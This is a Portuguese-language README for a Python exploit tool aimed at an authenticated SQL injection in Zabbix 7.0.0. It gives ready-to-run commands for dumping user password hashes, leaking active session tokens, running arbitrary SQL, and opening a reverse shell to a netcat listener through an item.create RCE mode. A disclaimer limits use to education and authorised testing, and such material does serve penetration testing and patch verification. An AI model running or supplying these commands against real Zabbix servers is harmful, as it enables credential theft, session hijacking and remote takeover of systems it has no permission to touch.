
Isto é apenas para fins educacionais. Por favor, não use contra sistemas não autorizados.
Um script em Python para explorar uma vulnerabilidade de injeção SQL autenticada no Zabbix 7.0.0, suportando múltiplos modos de ação, incluindo extração de dados de usuários, vazamento de tokens de sessão, execução remota de comandos (RCE) e injeção de consultas personalizadas.
⚠️ AVISO LEGAL:
Este script é apenas para fins educacionais e de teste de penetração autorizado.
Não utilize em sistemas que você não possui ou para os quais não tenha permissão explícita para testar.
O autor não se responsabiliza por qualquer uso indevido ou danos causados por esta ferramenta.
requests libraryInstale os requisitos se necessário:
pip install requests
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]
| Modo | Descrição | Requer Token de Admin |
|---|---|---|
| leak-users | Extrai todos os IDs de usuários, nomes de usuário, hashes de senhas e funções | ❌ |
| leak-tokens | Extrai todos os IDs de sessão ativos do banco de dados | ❌ |
| rce | Inicia um reverse shell via exploit do item.create | ✅ |
| custom | Executa qualquer consulta SQL personalizada via injeção | ❌ |
Extrair Hashes de Usuários
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users
Vazar Tokens de Sessão
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens
Execução Remota de Comandos (Reverse Shell)
# Start a listener first:
nc -lvnp 9001
# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce
Injeção SQL Personalizada
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"
sqliZabbix.py # Main exploit script
README.md # This documentation
Anthony (@874anthony)
Feito com amor e curiosidade 🐍
Este projeto é lançado sob a Licença MIT. Por favor, use com responsabilidade.